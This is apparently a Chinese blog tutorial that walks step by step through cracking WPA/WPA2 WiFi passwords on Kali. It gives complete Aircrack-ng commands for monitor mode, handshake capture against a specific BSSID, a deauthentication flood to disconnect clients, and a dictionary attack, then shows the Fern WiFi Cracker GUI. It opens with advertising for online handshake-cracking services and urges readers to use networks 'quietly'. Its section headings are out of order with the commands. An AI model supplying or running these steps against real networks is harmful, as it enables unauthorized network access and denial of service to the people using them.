握手包 Aircrack-ng破解WPA/WPA2加密WiFi教程(Kali)

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 握手包跑包

各位好 又见面了 我是曹操 今天给大家带来一篇新的教程

希望各位细心学习 低调用网

airmon-ng

一、简介
以前学习Kali时,很多人都称其为”WiFi破解神器”。我对此感到困扰,一方面是因为我不懂如何进行破解,另一方面是因为我怀疑他们是否真的能够破解。我隐约觉得所谓的WiFi破解并不是什么技术性的操作。

后来,我掌握了一些基础知识,并购买了一个无线网卡。按照网上的教程,我只需敲击几条命令就能”破解”一个弱密码的WiFi。这确实不需要太多技术知识,也没有太多操作性。

因此,我没有做太多记录。但最近需要进行演示时,我发现自己忘记了具体的操作步骤,所以我决定重新整理并记录下来。

对于无线网卡,没有必要购买官方推荐的几百块钱的产品,甚至只在国外销售的产品。在某淘上,只要支持Kali并且评论中说可以使用的产品基本上都没问题。

二、破解WPA/WPA2类型的WiFi操作
WEP破解和WPA破解的操作有些不同。首先,WEP协议存在漏洞,容易被破解,但现在基本上没人使用了。其次,我这里没有WEP类型的WiFi,所以这里只讲解WPA破解。

2.1 查看可用的无线网卡

握手包

airmon-ng start wlan0 9
iwconfig

握手包

airodump-ng wlan0mon

2.2 将无线网卡设置为监听模式
在命令中,9表示第9信道(channel 9)。使用iwconfig命令确认是否成功启动监听模式,主要表现为网卡名称由wlan0变为wlan0mon,Mode值为Monitor。

2.3 扫描周围的WiFi

握手包

扫描结果中,BSSID代表WiFi的MAC地址,PWR代表信号强度(结果一般按照强度排序),Data代表监听期间的流量总和,CH代表WiFi所使用的信道,ENC代表加密算法,ESSID代表WiFi的名称。当看到自己想要破解的WiFi后,直接按下Ctrl+C终止命令即可。在这里,我们的目标是名为”pentest”的WiFi,其BSSID为B0:D5:9D:42:FA:A3,信道为11。

# -c指定信道,一定要是上一步查到的要破解的wifi所用信道
# -bssid指定bssid值,一定要是上一步查到的要破解的wifi的bssid
# -w指定捕获的握手到保存到的文件名
airodump-ng -c 11 --bssid B0:D5:9D:42:FA:A3 -w /root/Desktop/wifi_ivs_file wlan0mon

握手包

# -0表示通知设备断开连接
# 10表示deauth攻击次数,小点大点都行吧
# -a指定仿造的wifi的mac地址(即bssid)
# -c表示要让认证失效的设备的mac地址,在上一步中可以看到
aireplay-ng -0 10 -a B0:D5:9D:42:FA:A3 -c C4:F0:81:02:87:5E wlan0mon

2.4 开始抓取握手包并保存为文件
2.5 主动攻击以获取握手包(可选)
在上一步中,我们是被动地等待握手包的抓取,这取决于是否有设备与目标WiFi成功认证。但对于已连接设备的WiFi,我们可以使用aireplay-ng进行deauth洪水攻击,使已连接设备掉线。掉线的设备通常会自动重新连接WiFi,这样我们就能轻松地获取握手包。保持上一步的抓包命令不中断,新开一个窗口执行以下命令:

握手包握手包握手包

如下图所示,我们成功抓到了B0:D5:9D:42:FA:A3的握手包。使用Ctrl+C终止抓包命令即可。此时,在指定的目录下会生成以下四个文件(每次执行抓包命令都会生成一组文件,所以在选择文件时可以使用*通配符)。

# -w指定要使用口令字典文件
# -b指定要目标wifi的mac地址(亦即bssid)
# wifi_ivs_file*.cap是抓取到握手包的数据包文件,*是通配符
aircrack-ng -w /usr/share/nmap/nselib/data/passwords.lst -b B0:D5:9D:42:FA:A3 /root/Desktop/wifi_ivs_file*.cap

握手包

airmon-ng stop wlan0mon
iwconfig

2.6 使用字典文件进行暴力破解密码
如果字典文件中包含了WiFi的密码,那么我们就能找到WiFi的密码;如果字典文件中没有包含密码,那么我们就找不到密码。(因此,WiFi的破解成功率取决于字典文件的大小)

2.7 关闭网卡的监听模式(可选)
在第二步中,我们使用airmon-ng将网卡设置为监听模式,最后我们需要将网卡还原。

握手包

fern-wifi-cracker

三、使用Fern WiFi Cracker进行图形化破解
Aircrack-ng的破解过程虽然不难,但记住前后几条命令及参数仍然有些麻烦。如果能使用图形界面工具进行操作,那就方便多了。Fern WiFi Cracker正是将Aircrack-ng的几个步骤图形化的工具。

将无线网卡插入Kali系统中,使用命令启动Fern WiFi Cracker。

握手包握手包

第一步是选择网卡,第二步是扫描WiFi,第三步是选择WiFi类型并进入破解页面。

在第一步中,双击选择要破解的WiFi;在第二步中,点击”Browse”按钮选择口令字典文件;在第三步中,点击”Attack”按钮开始破解;在第四步中,如果破解成功,口令将会在第四处列出(右键可复制)。

赞(1)